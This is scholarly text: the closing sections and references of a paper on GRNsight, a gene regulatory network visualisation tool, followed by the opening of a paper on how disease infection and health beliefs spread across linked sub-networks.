feature is not implemented at this time. In the end, even the examples given by Wilkinson et al. (2016) have varying levels of adherence to the FAIR principles or “FAIRness,” which, they argue, should be used as a guide to the incremental improvement of resources. Although GRNsight has the limitations discussed above, we have done as much as we can to achieve FAIRness at this time. CONCLUSIONS We have successfully implemented GRNsight, a web application and service for visualizing small- to medium-scale GRNs that is simple and intuitive to use. GRNsight accepts an input file in Microsoft Excel format (.xlsx), reading a weighted or unweighted adjacency matrix where the regulators are in columns and the target genes are in rows, and automatically lays out and displays unweighted and weighted network graphs in a way that is familiar to biologists. GRNsight also has the capability of importing and exporting files in SIF and GraphML formats. Although GRNsight was originally developed for use with the GRNmap modeling software, and has provided useful insight into the interpretation of the GRN model described in Dahlquist et al. (2015), it has general applicability for displaying any small, unweighted or weighted network with directed edges for systems biology or other application domains. Thus, GRNsight inhabits a niche not satisfied by other software, doing “one thing well.” GRNsight also serves as a model for how best practices for software engineering support reproducible research and can be learned simultaneously with the development of useful bioinformatics software. ACKNOWLEDGEMENTS We would like to thank Katrina Sherbina and B.J. Johnson for their input during the early stages of GRNsight development. We would also like to thank Masao Kitamura for assistance with setting up and administering the GRNsight server. We thank the 2015–2016 GRNmap research team, Chukwuemeka E. Azinge, Juan S. Carrillo, Kristen M. Horstmann, Kayla C. Jackson, K. Grace Johnson, Brandon J. Klein, Tessa A. Morris, Margaret J. O’Neil, Trixie Anne M. Roque, and Natalie E. Williams, and the students enrolled in the Loyola Marymount University Spring 2015 course Biology 398-04: Biomathematical Modeling/Mathematics 388-01: Survey of Biomathematics for testing the software. Finally, we thank Manuel Corpas and an anonymous reviewer for suggestions that have improved both the GRNsight code and this manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was partially supported by NSF award 0921038 (K.D.D., B.G.F.), a Kadner-Pitts Research Grant (K.D.D.), the Loyola Marymount University Summer Undergraduate Research Program (A.V.) and the Loyola Marymount University Rains Research Assistant Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 20/24 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Program (N.A.A.). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: NSF (K.D.D., B.G.F.): 0921038. Kadner-Pitts Research Grant (K.D.D.). Loyola Marymount University Summer Undergraduate Research Program (A.V.). Loyola Marymount University Rains Research Assistant Program (N.A.A.). Competing Interests The authors declare that they have no competing interests. Author Contributions � Kam D. Dahlquist conceived and designed the project, performed the computation work, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � John David N. Dionisio conceived and designed the project, performed the computation work, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � Ben G. Fitzpatrick conceived and designed the project, performed the computation work, analyzed the data, reviewed and edited drafts of the paper. � Nicole A. Anguiano conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � Anindita Varshneya conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � Britain J. Southwick conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � Mihir Samdarshi conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. Data Deposition The following information was supplied regarding data availability: GitHub code repository: https://github.com/dondi/GRNsight. Web application: http://dondi.github.io/GRNsight/. REFERENCES Afgan E, Baker D, van den Beek M, Blankenberg D, Bouvier D, Čech M, Chilton J, Clements D, Coraor N, Eberhard C, Grüning B, Guerler A, Hillman-Jackson J, Von Kuster G, Rasche E, Soranzo N, Turaga N, Taylor J, Nekrutenko A, Goecks J. 2016. The Galaxy platform for accessible, reproducible and collaborative biomedical analyses: 2016 update. Nucleic Acids Research 44(W1):W3–W10 DOI 10.1093/nar/gkw343. Alon U. 2007. An Introduction to Systems Biology: Design Principles of Biological Circuits. Boca Raton: Chapman & Hall/CRC. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 21/24 https://github.com/dondi/GRNsight http://dondi.github.io/GRNsight/ http://dx.doi.org/10.1093/nar/gkw343 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Bastian M, Heymann S, Jacomy M. 2009. Gephi: an open source software for exploring and manipulating networks. In: Third International AAAI Conference on Weblogs and Social Media. Vol. 8. Palo Alto: AAAI Publications, 361–362. Borneman AR, Leigh-Bell JA, Yu H, Bertone P, Gerstein M, Snyder M. 2006. Target hub proteins serve as master regulators of development in yeast. Genes & Development 20(4):435–448 DOI 10.1101/gad.1389306. Bostock M, Ogievetsky V, Heer J. 2011. D 3 : data-driven documents. IEEE Transactions on Visualization and Computer Graphics 17(12):2301–2309 DOI 10.1109/TVCG.2011.185. Brandes U, Eiglsperger M, Herman I, Himsolt M, Marshall MS. 2001. GraphML progress report structural layer proposal. In: Graph Drawing: 9th International Symposium, GD, 2001 Vienna, Austria, September 23–26, 2001 Revised Papers. Berlin Heidelberg: Springer, 501–512. Brazas MD, Yamada JT, Ouellette BFF. 2010. Providing web servers and training in bioinformatics: 2010 update on the bioinformatics links directory. Nucleic Acids Research 38(Suppl 2):W3–W6 DOI 10.1093/nar/gkq553. Brown E. 2014. Web Development with Node and Express. Beijing: O’Reilly. Buchman AR, Kornberg RD. 1990. A yeast ARS-binding protein activates transcription synergistically in combination with other weak activating factors. Molecular and Cellular Biology 10(3):887–897 DOI 10.1128/MCB.10.3.887. Card SK, Mackinlay JD, Shneiderman B. 1999. Chapter 1: information visualization. Readings in Information Visualization: Using Vision to Think. San Diego: Academic Press. Dahlquist KD, Fitzpatrick BG, Camacho ET, Entzminger SD, Wanner NC. 2015. Parameter estimation for gene regulatory networks from microarray data: cold shock response in Saccharomyces cerevisiae. Bulletin of Mathematical Biology 77(8):1457–1492 DOI 10.1007/s11538-015-0092-6. Dahlquist KD, Fitzpatrick BG, Dionisio JDN, Anguiano NA, Carrillo JS, Morris TA, Varshneya A, Williams NE, Johnson KG, Roque TAM, Horstmann KM, Samdarshi M, Azinge CE, Klein BJ, O’Neil MJ. 2016a. GRNmap and GRNsight: open source software for dynamical systems modeling and visualization of medium-scale gene regulatory networks [v1; not peer reviewed]. F1000Research 5(ISCB Comm J):1618 DOI 10.7490/f1000research.1112518.1. Dahlquist KD, Fitzpatrick BG, Dionisio JDN, Anguiano NA, Carrillo JS, Roque TAM, Varshneya A, Samdarshi M, Azinge CE. 2016b. GRNmap and GRNsight: open source software for dynamical systems modeling and visualization of medium-scale gene regulatory networks [v1; not peer reviewed]. F1000Research 5(ISCB Comm J):1637 DOI 10.7490/f1000research.1112534.1. Dionisio JDN, Dahlquist KD. 2008. Improving the computer science in bioinformatics through open source pedagogy. ACM SIGCSE Bulletin 40(2):115–119 DOI 10.1145/1383602.1383648. Franz M, Lopes CT, Huck G, Dong Y, Sumer O, Bader GD. 2016. Cytoscape.js: a graph theory library for visualisation and analysis. Bioinformatics 32(2):309–311 DOI 10.1093/bioinformatics/btv557. Gostner R, Baldacci B, Morine MJ, Priami C. 2014. Graphical modeling tools for systems biology. ACM Computing Surveys 47(2):16 DOI 10.1145/2633461. Harbison CT, Gordon DB, Lee TI, Rinaldi NJ, Macisaac KD, Danford TW, Hannett NM, Tagne J-B, Reynolds DB, Yoo J, Jennings EG, Zeitlinger J, Pokholok DK, Kellis M, Rolfe PA, Takusagawa KT, Lander ES, Gifford DK, Fraenkel E, Young RA. 2004. Transcriptional regulatory code of a eukaryotic genome. Nature 431(7004):99–104 DOI 10.1038/nature02800. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 22/24 http://dx.doi.org/10.1101/gad.1389306 http://dx.doi.org/10.1109/TVCG.2011.185 http://dx.doi.org/10.1093/nar/gkq553 http://dx.doi.org/10.1128/MCB.10.3.887 http://dx.doi.org/10.1007/s11538-015-0092-6 http://dx.doi.org/10.7490/f1000research.1112518.1 http://dx.doi.org/10.7490/f1000research.1112534.1 http://dx.doi.org/10.1145/1383602.1383648 http://dx.doi.org/10.1093/bioinformatics/btv557 http://dx.doi.org/10.1145/2633461 http://dx.doi.org/10.1038/nature02800 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Ison J, Rapacki K, Ménager H, Kalaš M, Rydza E, Chmura P, Anthon C, Beard N, Berka K, Bolser D, Booth T, Bretaudeau A, Brezovsky J, Casadio R, Cesareni G, Coppens F, Cornell M, Cuccuru G, Davidsen K, Vedova GD, Dogan T, Doppelt-Azeroual O, Emery L, Gasteiger E, Gatter T, Goldberg T, Grosjean M, Grüning B, Helmer-Citterich M, Ienasescu H, Ioannidis V, Jespersen MC, Jimenez R, Juty N, Juvan P, Koch M, Laibe C, Li J-W, Licata L, Mareuil F, Mičeti�c I, Friborg RM, Moretti S, Morris C, Möller S, Nenadic A, Peterson H, Profiti G, Rice P, Romano P, Roncaglia P, Saidi R, Schafferhans A, Schwämmle V, Smith C, Sperotto MM, Stockinger H, Va�reková RS, Tosatto SCE, de la Torre V, Uva P, Via A, Yachdav G, Zambelli F, Vriend G, Rost B, Parkinson H, Løngreen P, Brunak S. 2016. Tools and data services registry: a community effort to document bioinformatics resources. Nucleic Acids Research 44(D1):D38–D47 DOI 10.1093/nar/gkv1116. Lawlor B, Walsh P. 2015. Engineering bioinformatics: building reliability, performance and productivity into bioinformatics software. Bioengineered 6(4):193–203 DOI 10.1080/21655979.2015.1050162. Lee TI, Rinaldi NJ, Robert F, Odom DT, Bar-Joseph Z, Gerber GK, Hannett NM, Harbison CT, Thompson CM, Simon I, Zeitlinger J, Jennings EG, Murray HL, Gordon DB, Ren B, Wyrick JJ, Tagne J-B, Volkert TL, Fraenkel E, Gifford DK, Young RA. 2002. Transcriptional regulatory networks in Saccharomyces cerevisiae. Science 298(5594):799–804 DOI 10.1126/science.1075090. Martin RC. 2008. Clean Code: A Handbook of Agile Software Craftsmanship. Upper Saddle River: Prentice Hall. McQuilton P, Gonzalez-Beltran A, Rocca-Serra P, Thurston M, Lister A, Maguire E, Sansone S-A. 2016. BioSharing: curated and crowd-sourced metadata standards, databases and data policies in the life sciences. Database: Journal of Biological Databases and Curation 2016:baw075 DOI 10.1093/database/baw075. Miyake T, Reese J, Loch CM, Auble DT, Li R. 2004. Genome-wide analysis of ARS (autonomously replicating sequence) binding factor 1 (Abf1p)-mediated transcriptional regulation in Saccharomyces cerevisiae. Journal of Biological Chemistry 279(33):34865–34872 DOI 10.1074/jbc.M405156200. Ni L, Bruce C, Hart C, Leigh-Bell J, Gelperin D, Umansky L, Gerstein MB, Snyder M. 2009. Dynamic and complex transcription factor binding during an inducible response in yeast. Genes & Development 23(11):1351–1363 DOI 10.1101/gad.1781909. Nielsen J. 1993. Usability Engineering. Boston: Academic Press. Norman DA. 2013. The Design of Everyday Things. New York: Basic Books. Pavlopoulos GA, Malliarakis D, Papanikolaou N, Theodosiou T, Enright AJ, Iliopoulos I. 2015. Visualizing genome and systems biology: technologies, tools, implementation techniques and trends, past, present and future. GigaScience 4(1):38 DOI 10.1186/s13742-015-0077-2. Prli�c A, Procter JB. 2012. Ten simple rules for the open development of scientific software. PLoS Computational Biology 8(12):e1002802 DOI 10.1371/journal.pcbi.1002802. Raymond ES. 1999. The Cathedral & the Bazaar: Musings on Linux and Open Source by an Accidental Revolutionary. Beijing: O’Reilly. Saito R, Smoot ME, Ono K, Ruscheinski J, Wang P-L, Lotia S, Pico AR, Bader GD, Ideker T. 2012. A travel guide to Cytoscape plugins. Nature Methods 9(11):1069–1076 DOI 10.1038/nmeth.2212. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 23/24 http://dx.doi.org/10.1093/nar/gkv1116 http://dx.doi.org/10.1080/21655979.2015.1050162 http://dx.doi.org/10.1126/science.1075090 http://dx.doi.org/10.1093/database/baw075 http://dx.doi.org/10.1074/jbc.M405156200 http://dx.doi.org/10.1101/gad.1781909 http://dx.doi.org/10.1186/s13742-015-0077-2 http://dx.doi.org/10.1371/journal.pcbi.1002802 http://dx.doi.org/10.1038/nmeth.2212 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Salomonis N, Hanspers K, Zambon AC, Vranizan K, Lawlor SC, Dahlquist KD, Doniger SW, Stuart J, Conklin BR, Pico AR. 2007. GenMAPP 2: new features and resources for pathway analysis. BMC Bioinformatics 8(1):217 DOI 10.1186/1471-2105-8-217. Schade B, Jansen G, Whiteway M, Entian KD, Thomas DY. 2004. Cold adaptation in budding yeast. Molecular Biology of the Cell 15(12):5492–5502 DOI 10.1091/mbc.E04-03-0167. Schultheiss SJ. 2011. Ten simple rules for providing a scientific Web resource. PLoS Computational Biology 7(5):e1001126 DOI 10.1371/journal.pcbi.1001126. Schultheiss SJ, Münch M-C, Andreeva GD, Rätsch G. 2011. Persistence and availability of web services in computational biology. PLoS ONE 6(9):e24914 DOI 10.1371/journal.pone.0024914. Shannon P, Markiel A, Ozier O, Baliga NS, Wang JT, Ramage D, Amin N, Schwikowski B, Ideker T. 2003. Cytoscape: a software environment for integrated models of biomolecular interaction networks. Genome Research 13(11):2498–2504 DOI 10.1101/gr.1239303. Shneiderman B, Plaisant C, Cohen M, Jacobs SM, Elmqvist N, Diakopoulos N. 2016. Designing the User Interface: Strategies for Effective Human-Computer Interaction. Hoboken: Pearson. Shore D, Nasmyth K. 1987. Purification and cloning of a DNA binding protein from yeast that binds to both silencer and activator elements. Cell 51(5):721–732 DOI 10.1016/0092-8674(87)90095-X. Smoot ME, Ono K, Ruscheinski J, Wang P-L, Ideker T. 2011. Cytoscape 2.8: new features for data integration and network visualization. Bioinformatics 27(3):431–432 DOI 10.1093/bioinformatics/btq675. Teixeira MC, Monteiro PT, Guerreiro JF, Gonçalves JP, Mira NP, dos Santos SC, Cabrito TR, Palma M, Costa C, Francisco AP, Madeira SC, Oliveira AL, Freitas AT, Sá-Correia I. 2014. The YEASTRACT database: an upgraded information system for the analysis of gene and genomic transcription regulation in Saccharomyces cerevisiae. Nucleic Acids Research 42(D1): D161–D166 DOI 10.1093/nar/gkt1015. Tufte ER. 2001. The Visual Display of Quantitative Information. Cheshire: Graphics Press. Veretnik S, Fink JL, Bourne PE. 2008. Computational biology resources lack persistence and usability. PLoS Computational Biology 4(7):e1000136 DOI 10.1371/journal.pcbi.1000136. Wilkinson MD, Dumontier M, Aalbersberg IJJ, Appleton G, Axton M, Baak A, Blomberg N, Boiten J-W, da Silva Santos LB, Bourne PE, Bouwman J, Brookes AJ, Clark T, Crosas M, Dillo I, Dumon O, Edmunds S, Evelo CT, Finkers R, Gonzalez-Beltran A, Gray AJG, Groth P, Goble C, Grethe JS, Heringa J, ’t Hoen PAC, Hooft R, Kuhn T, Kok R, Kok J, Lusher SJ, Martone ME, Mons A, Packer AL, Persson B, Rocca-Serra P, Roos M, van Schaik R, Sansone S-A, Schultes E, Sengstag T, Slater T, Strawn G, Swertz MA, Thompson M, van der Lei J, van Mulligen E, Velterop J, Waagmeester A, Wittenburg P, Wolstencroft K, Zhao J, Mons B. 2016. The FAIR Guiding Principles for scientific data management and stewardship. Scientific Data 3:160018 DOI 10.1038/sdata.2016.18. Wilson G, Aruliah DA, Brown CT, Chue Hong NP, Davis M, Guy RT, Haddock SHD, Huff KD, Mitchell IM, Plumbley MD, Waugh B, White EP, Wilson P. 2014. Best practices for scientific computing. PLoS Biology 12(1):e1001745 DOI 10.1371/journal.pbio.1001745. Yachdav G, Goldberg T, Wilzbach S, Dao D, Shih I, Choudhary S, Crouch S, Franz M, Garcı́a A, Garcı́a LJ, Grüning BA, Inupakutika D, Sillitoe I, Thanki AS, Vieira B, Villaveces JM, Schneider MV, Lewis S, Pettifer S, Rost B, Corpas M. 2015. Anatomy of BioJS, an open source community for the life sciences. eLife 4:e07009 DOI 10.7554/eLife.07009. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 24/24 http://dx.doi.org/10.1186/1471-2105-8-217 http://dx.doi.org/10.1091/mbc.E04-03-0167 http://dx.doi.org/10.1371/journal.pcbi.1001126 http://dx.doi.org/10.1371/journal.pone.0024914 http://dx.doi.org/10.1101/gr.1239303 http://dx.doi.org/10.1016/0092-8674(87)90095-X http://dx.doi.org/10.1093/bioinformatics/btq675 http://dx.doi.org/10.1093/nar/gkt1015 http://dx.doi.org/10.1371/journal.pcbi.1000136 http://dx.doi.org/10.1038/sdata.2016.18 http://dx.doi.org/10.1371/journal.pbio.1001745 http://dx.doi.org/10.7554/eLife.07009 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ GRNsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks Introduction Materials and Methods Results and Discussion Conclusions flink5 References work_sa3hjtqiofa2vajqd4wuth7rmi ---- What You Believe Travels Differently: Information and Infection Dynamics across Sub-networks Abstract: In order to understand the transmission of a disease across a population we will have to understand not only the dynamics of contact infection but the transfer of health-care beliefs and resulting health-care behaviors across that population. This paper is a first step in that direction, focusing on the contrasting role of linkage or isolation between sub-networks in (a) contact infection and (b) belief transfer. Using both analytical tools and agent-based simulations we show that it is the structure of a network that is primary for predicting contact infection—whether the networks or sub-networks at issue are distributed ring networks or total networks (hubs, wheels, small world, random, or scale-free for example). Measured in terms of time to total infection, degree of linkage between sub- networks plays a minor role. The case of belief is importantly different. Using a simplified model of belief reinforcement, and measuring belief transfer in terms of time to community consensus, we show that degree of linkage between sub-networks plays a major role in social communication of beliefs. Here, in contrast to the case of contract infection, network type turns out to be of relatively minor importance. What you believe travels differently. In a final section we show that the pattern of belief transfer exhibits a classic power law regardless of the type of network involved. Authors: Patrick Grim is Distinguished Teaching Professor of Philosophy at Stony Brook, co-author of The Philosophical Computer (MIT 1998) and Beyond Sets (Ontos/Verlag 2011). Grim's publications appear not only in philosophy but in computer science, theoretical biology, cognitive science, linguistics, and game theory. Christopher Reade is a consultant at ThoughtWorks Inc. and a graduate of the Gerald R. Ford School of Public Policy at the University of Michigan. Steven Fisher is an undergraduate in Complex Systems studying networks and network theory in the Center for the Study of Complex Systems at the University of Michigan. Daniel J. Singer is a Ph.D. candidate in Philosophy at the University of Michigan working on foundational questions of epistemology and formal epistemology. Dr. Stephen Majewicz is an Associate Professor in Mathematics at Kingsborough Community College. His fields of interest include nilpotent groups, exponential A-groups and nilpotent R-powered groups, combinatorial group theory, and axiomatic set theory. Acknowledgements: This work was supported in part by the National Institute of General Medical Sciences MIDAS grant 1U54GM088491-01, Computational Models of Infectious Disease Threats, and by a pilot grant for Developing an Agent-Based Model to Assess Racial Differences in Medical Discrimination, Social Support and Trust, administered by the Graduate School for Public Health at the University of Pittsburgh. Please contact Patrick Grim for correspondence at pgrim@notes.cc.sunysb.edu Patrick Grim Department of Philosophy, Stony Brook University Stony Brook, NY, USA Christopher Reade Gerald R. Ford School of Public Policy, University of Michigan Ann Arbor, MI, USA Daniel J. Singer Department of Philosophy, University of Michigan, Ann Arbor, MI, USA Steven Fisher Center for Study of Complex Systems, University of Michigan Ann Arbor, MI, USA Stephen Majewicz Department of Mathematics, Kingsborough Community College Brooklyn, NY, USA INTRODUCTION Public health has been a primary target for agent-based and network modeling. A significant amount of work has been done on the role of network structure in the spread of disease (Meyers, Pourbohloul, Newman, Skowronski & Brunham 2005; Keeling 2005; Ferrari, Bansal, Meyers & Bjørnstad 2006 ; Miller & Hyman 2007; Eubank, Guclu, Kumar, Marathe, Srinivasan, Toroczkai & Wang 2004). But it is clear that health-care behaviors are as crucial in the pattern of any pandemic as are the biological characteristics of the pathogens involved (Epstein, Parker, Cummings & Hammond 2008; Auld 2003; Del Valle, Hethcote, Hyman, & Castillo-Chavez 2005; Barrett, Bisset, Leidig, Marathe, & Marathe 2009; Funk, Gilad, Watkins, & Jansen 2009; Hallett, Gregson, Lewis, Lopman, & Garnett 2007). Those health- care behaviors are contingent on beliefs. On standard models, these include at least beliefs regarding severity, susceptibility, effectiveness and the cost of preventive measures (Harrison, Mullen, & Green 1992; Janz & Becker, 1984; Mullen, Hersey, & Iverson 1987; Strecher & Rosenstock 1997). In order to understand the spread of disease we will have to better understand the spread of beliefs and behaviors. Moreover, as public health interventions are often targeted to beliefs and behaviors we will have to better understand the spread of beliefs and behaviors in order to intervene effectively. For a better picture ofdisease dynamics and to better the prospects for effective intervention we need a better understanding of the dynamics of belief transmission across social networks. Although important empirical work has been done on social networks and the diffusion of beliefs and behaviors (Valente 1995, 2010; Morris, Podhisita, Wawer & Handcock 1996; Morris 1997; Valente & Davis, 1999; Kincaid 2000; Hamilton, Handcock & Morris 2008), significantly less has been done with the tools of agent-based modeling toward understanding the abstract dynamics of belief (see however Centola & Macy 2007 and Golub & Jackson, forthcoming). 1 In what follows we take some steps in that direction, with an emphasis on the pervasive social phenomenon of sub-network groups or clusters. Our social networks do not form a uniform and homogenous web. Social communities are composed of sub- communities, with varying degrees of contact and isolation between them; both in terms of the physical contact necessary for disease transmission and the informational contact crucial to the transmission of belief. Racial, ethnic, socio-economic, demographic, and geographical sub-communities offer a clear example. Racial and economic sub- communities may be more or less isolated or integrated with other sub-communities, with varying strengths of information transfer, communication, and trust. In the case of a pandemic, degree of isolation or integration will be crucial in predicting the course of contact and therefore the dynamics of disease transmission. But in such a case degree of informational isolation or integration will also be crucial in tracking changes in health care beliefs and behaviors, with both immediate and long-range effects on the course of the disease. What we offer is an abstract model of this very real phenomenon. We track the role of degree of linkage between sub-networks in the transfer of disease and the transfer of information, with contrasting results in the two cases. Linkages between sub-networks have also been termed 'bridges,' analogous to a concept of bridges in 1 Centola and May consider 'complex contagions', in which more than one neighbor is required for infection. This is not strictly speaking a reinforcement effect, but does show dynamics similar to that studied for belief reinforcement here—and a similar contrast with simple infection. Golub and Jackson outline analytic results on 'homophily' in random networks, with a similar emphasis on the contrast between diffusion and belief averaging. Our work here, part analytic and part from agent-based simulations, extends that work and shows that the central contrast holds across networks of various types. computer networking and identified in Trotter, Rothenberg and Coyle (1995) as a key area for future work in network studies and health care. L. C. Freeman (1977) speaks of degree of linkage in terms of segregation and integration between sub-networks. Ours is a formal study of networks, however, and such a terminology may carry distracting connotations. Homophilous networks, in which nodes link preferentially with others with similar characteristics, often take the form of clustered sub-networks with limited degrees of linkage; precisely the type we study here. Our focus is on the implications of a network structure, however, not how a network may have acquired that structure. We focus on the structure of contact and informational networks and the impact of that structure on the dynamics of infection and information. In the first section we outline simple analytic results and a wider spread of agent-based simulation results regarding the impact of degree of linkage between sub- networks on the spread of infection across a community. Those results regarding simple diffusion serve as a base of comparison for the very different results regarding the effects of degree of linkage on the transmission of beliefs. The dynamics of belief turns out to be very different from the dynamics of contact infection. For infection, measured in terms of average time to total infection across a network, it is the structure of the network or its sub- networks that is of primary importance— whether the basic network or networks at issue form rings, total networks, hubs, wheels, small worlds, scale-free or random networks. The degree of linkage between sub-networks of such a type is of relatively minor importance for infection. For belief transmission on the model we construct, in contrast, measured in terms of average time to total consensus, network structure is of minor significance. Where the dynamics of belief is at issue, it is the degree of linkage between sub-networks that is of primary importance. The effect of degree of linkage on belief change, we show, regardless of network type, shows the pattern of a classic power law. Our effort here is to emphasize a basic point regarding the different dynamics of belief and infection across networks. More complete details of both analytic results and results from simulation are available in an on-line appendix at www.pgrim.org/connections. Infection Dynamics across Linked Sub- Networks First Example of Ring and Total Networks Figure 1 shows a series of four network structures, clearly related in terms of structure. The network on the left is a single total network, also known as a complete network or maximal graph. The three pairs on the right form paired sub-networks with increasing numbers of connecting links. We will use degree of linkage in a relative sense to refer to increased connecting links or bridges of this sort. A quantitative measure is possible in terms of the number of actual linkages between nodes of distinct groups or sub-networks over the total possible. 2 We focus on varying degrees of connection between sub-networks of varying structure. For simplicity we use just two sub-networks of equal size, concentrating on ring sub-networks, total or connected networks, small worlds, random and scale-free sub-networks. How does the degree of connection between two sub- networks affect the dynamics of diffusion or infection across the network as a whole? How do results on degree of connection between sub- networks of a specific structure compare with results on a single network of the same structure to which the same number of links are added? Here theoretical fundamentals trace to Granovetter 1973; and an early example of 2 Full linkage between total sub-networks, such that every node in one sub-network will connect to every node in the other sub-network, will result in the single total network on the left. But of course it will not hold in general that full linkage between sub- networks of type x will result in a single network of type x: full linkage between ring networks will not result in a single ring. Figure 1. A Single Total Network and Increased Degrees of Linkage between Total Sub-networks network analysis regarding infection appears in Klovdahl 1985. Some results are simple and analytic, but also indicate the variety that can be expected. Consider, at one extreme, a network composed of two totally connected sub-networks with a single link between them, as in the second network in Figure 1. How many steps will be required to total infection, starting from a single random infected node? Assuming a 100% infection rate, where n is the total number of nodes, the average number of steps to total infection is: where n is the total number of nodes. From any node other than those on the ends of our connecting link, there are three steps to total infection: (1) to all nodes of the immediate connected networks, (2) across the one connecting link, and (3) from there to all nodes of the opposite connected network. If the initially infected node is one of those on the ends of our connecting link, there are merely two steps to total infection, giving us the formula above. Adding further links has no dramatic effect in such a case. Because our sub-networks are totally connected, a first step in every case infects all nodes in a sub-network; from there any number of links between sub-networks merely transfer the infection to the second sub- network. For a network with two sub-networks of equal size, therefore, again assuming an infection rate of 100% rate and incorporating n nodes and m discrete links between sub- networks (links sharing no nodes), 3 the average time to total infection will be simply: As n increases relative to m ≠ 0, time to infection approaches a limit of 3. As m increases relative to n, with a limit of m = .5 n, time to infection approaches a limit of 2. For a single total network, like that on the left in Figure 1, any 'added' linkages would simply be redundant, with no effect at all: infection will in all cases be in a single step. Where sub-networks are total, variance in infection time is necessarily just between 2 and 3 steps. At the other extreme is the case of a network with rings as sub-components. Here variance in infection time is much greater. The maximal number of steps to full infection from a single node across a ring sub-network is s/2 3 In order to keep the outline of basic relationships as simple as possible we ignore the complication that links can share a single node at one end. with s as the number of nodes for that sub- network where s is even, or (s – 1)/2 in the case of odd numbers of nodes. The longest time for diffusion across a network of two equal-sized rings each with an even number of nodes n/2 is therefore: Where the number of nodes n/2 in each sub- network is odd the maximal number of steps is: If the source of infection is one of the nodes on the end of a bridge between sub-networks, time to infection will be minimal: where n/2 is even the minimal time to infection will be where n/2 is odd, time to infection will be Variance between maximum and minimum times to total infection is therefore extremely sensitive to the structure of sub-networks. In the case of total sub-networks, that variance is simply 1 regardless of the number of nodes. In the case of ring sub-networks, the variance is close to n/4. The consequences for prediction are clear: to the extent that a social network approaches a total network, point predictions of infection times can be made with a high degree of confidence. To the extent that a social network approaches a ring, on the other hand, point predictions will not be possible without wide qualification. The structure of sub-networks is crucial for other factors as well. We have noted that increasing links between sub-networks has a minimal effect where those sub-networks are total. Where sub-networks are rings of 50 nodes, in contrast, the effect is dramatic. The top line in Figure 2 shows results from a computer-instantiated agent-based model in which we progressively increase the number of links between random nodes of those sub- networks from 1 to 50. For each number between 1 and 50 we create 1000 networks with random links of that number between sub- networks, taking the average over the 1000 runs. For ring sub-networks the time to full infection decreases from an average of 38.1 steps for cases in which there is a single link between ring sub-networks to 7.6 for cases in which there are 50 links. Similar simulation results for added links between total sub-networks, in contrast, show a relatively flat result with decline in average time to infection from only 2.98 to 2.35. Difference in network structure clearly makes a major difference in time to total infection. That difference is not due to degree of linkage between sub-networks, however. A graph of results in which links are added across a single ring and not between ring sub-networks shows a result almost identical to that in Figure 2. The lesson from ring and total networks is that it is not the degree of linkage between sub- networks that affects time to total infection but overall network structure itself, whether characterizing a single network or linked sub- networks. Changes in infection rates with additional random links (1) across a single network and (2) between two smaller networks with the same structure show very much the same pattern. Degrees of linkage between sub- networks interact with the structure of those sub-networks in order to generate patterns of infection, but it is the structure of the networks rather than the degree of linkage that plays the primary role. Analytical and simulation results for hub and wheel networks, very much in line with conclusions above, are available in an online appendix (www.pgrim.org/connections). Figure 2. Average Time to Total Infection with Increasing Links between Sub-networks Infection Across Small World, Random, and Scale-Free Networks For patterns of infection, the importance of general structure type over degree of linkage between sub-networks holds for small world, scale free, and random networks as well. Results for small world networks are shown in the second line from the top in Figure 2 with roughly a 9% probability of rewiring for each node in an initial single ring (see Watts & Strogatz 1998). 4 Increasing linkages between sub-networks from 1 to 50 results in a decrease in steps to total infection from 22.5 steps to 4 Our probability is 'roughly' 9% because in each case we add minimal links so as to assure a connected network. Without that assurance, of course, infection is not guaranteed to percolate through the network as a whole. 7.45. Increasing links within a single small world follows virtually the same pattern, with a decrease from 19.8 to 7.2. Similar results for random and scale-free networks appear in the third and fourth graphed lines of Figure 4. For random networks, roughly 4.5 percent of possible connections are instantiated within each sub-network, with minimal links needed to guarantee connected networks. Our scale-free networks are constructed by the preferential attachment algorithm of Barabási and Albert (1999). Here as before there is little difference where additional links are added within a single network, whether small-world or scale-free. In each case the number of initial steps is slightly smaller, but only in the first 10 steps or so is there any significant difference and convergence is to the same point. In the case of random networks, times decrease from 9.79 to 6.45. In the case of scale-free networks, times decrease from 7.9 to 6.08. In all the cases considered, it is not degree of linkage between sub-networks but the network structure involved in both single and linked sub-networks that produces network-specific signatures for infection. This largely accords with analytic results by Golub and Jackson (forthcoming) on diffusion dynamics across linked random networks. 5 Golub and Jackson find that in the limit degree of linkage between random networks has no effect on time to total infection. What our results indicate is that such a result is by no means restricted to random networks, holding across network types quite generally. Where infection is concerned, a prediction of time to total infection demands a knowledge of the general structure of the contact network at issue—ring or total, for example, scale-free or random, but does not demand that we know whether it is a single network or a linked set of smaller networks of that same structure that is at issue. Infection on Networks: Qualifications and Provisos Results to this point have been calculated with an assumption of 100% infection—a disease guaranteed to be transmitted at every time-point of contact between individuals. More realistic assumptions regarding rate of infection affect the rates calculated above, more pointedly emphasizing the importance of structure. Here we again use ring and total networks as an example. Where sub-networks are total, probability of infection from single contact really makes a 5 Golub and Jackson characterize their results using the term 'homophily', defined in terms of the relative probability of node connection within as opposed to outside of a group or sub-network. For random networks, though not for other network structures, this corresponds to the degree of linkage between sub-networks that is our focus here. difference only at the link between sub- networks: as long as the probability of infection exceeds 2/n, a quick 